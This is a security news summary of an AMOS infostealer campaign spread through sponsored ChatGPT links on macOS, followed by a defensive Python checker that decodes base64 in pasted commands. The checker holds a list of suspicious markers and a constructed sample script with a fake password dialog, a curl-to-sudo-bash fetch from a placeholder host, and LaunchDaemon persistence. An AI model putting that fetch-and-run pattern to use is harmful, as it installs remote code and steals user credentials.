Overview
- Kaspersky first flagged the campaign and Huntress later reproduced an infection that began with a search like “clear disk space on Mac” leading to a sponsored ChatGPT link.
- The linked AI conversations contained obfuscated, base64-encoded commands that decode to a bash script displaying a fake password prompt and then installing the AMOS infostealer with elevated privileges.
- Huntress observed AMOS stealing browser and Keychain data and targeting cryptocurrency wallets, persisting via a LaunchDaemon watchdog and even replacing Ledger and Trezor apps with trojanized versions.
- Researchers confirmed poisoned results across multiple macOS troubleshooting queries and said some sponsored links were removed after disclosure, but they warned the technique is still in play.
- It remains unclear how widely this ad-to-AI-chat poisoning can be replicated across other platforms, and users are urged to avoid pasting unverified commands into Terminal and to verify instruction sources.
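As an added example, not code from Kaspersky's or Huntress's reporting, here is a small Python check that decodes base64 tokens embedded in a pasted one-liner and reports the markers a defender would want to see before anyone runs it in Terminal; the sample command and the marker list are constructed for this illustration, not a signature for the real AMOS script.

```python
import base64
import re

# Constructed heuristic for this example: strings whose presence in a decoded
# payload deserve a second look before the command is run. Not an AMOS signature.
SUSPICIOUS_MARKERS = {
    "sudo": "requests elevated privileges",
    "osascript": "invokes AppleScript (commonly used for fake password dialogs)",
    "curl": "fetches additional content from the network",
    "/Library/LaunchDaemons": "writes a LaunchDaemon (persistence)",
    "launchctl": "loads a launch job (persistence)",
    "xattr": "may strip the quarantine attribute",
    "| bash": "pipes fetched content straight into a shell",
    "| sh": "pipes fetched content straight into a shell",
}

# Anything long enough, in the base64 alphabet, with optional padding.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")


def decode_blobs(command: str) -> list[str]:
    """Return the decoded text of every base64-looking token in a command."""
    layers = []
    for token in B64_TOKEN.findall(command):
        try:
            layers.append(base64.b64decode(token, validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid base64, or not text: skip it
    return layers


def inspect_command(command: str) -> dict:
    """Decode embedded base64 and report which markers the payload contains."""
    layers = decode_blobs(command)
    findings = {m: why for layer in layers for m, why in SUSPICIOUS_MARKERS.items() if m in layer}
    return {"decoded_layers": layers, "findings": findings}


# Constructed stand-in for the kind of one-liner described above: a harmless
# script (dialog, fetch from a reserved .invalid domain, copy to LaunchDaemons)
# wrapped in base64 the way the poisoned chats did it.
SAMPLE_SCRIPT = (
    "#!/bin/bash\n"
    "osascript -e 'display dialog \"Disk cleanup needs your password\"'\n"
    "curl -fsSL http://example.invalid/helper.sh | sudo bash\n"
    "sudo cp helper.plist /Library/LaunchDaemons/\n"
)
SAMPLE_COMMAND = "echo " + base64.b64encode(SAMPLE_SCRIPT.encode()).decode() + " | base64 -D | bash"

if __name__ == "__main__":
    for marker, why in inspect_command(SAMPLE_COMMAND)["findings"].items():
        print(f"{marker!r}: {why}")
```

Paste the suspect command into `inspect_command` before running it; an empty `findings` dict is not a clean bill of health, only the absence of these particular markers.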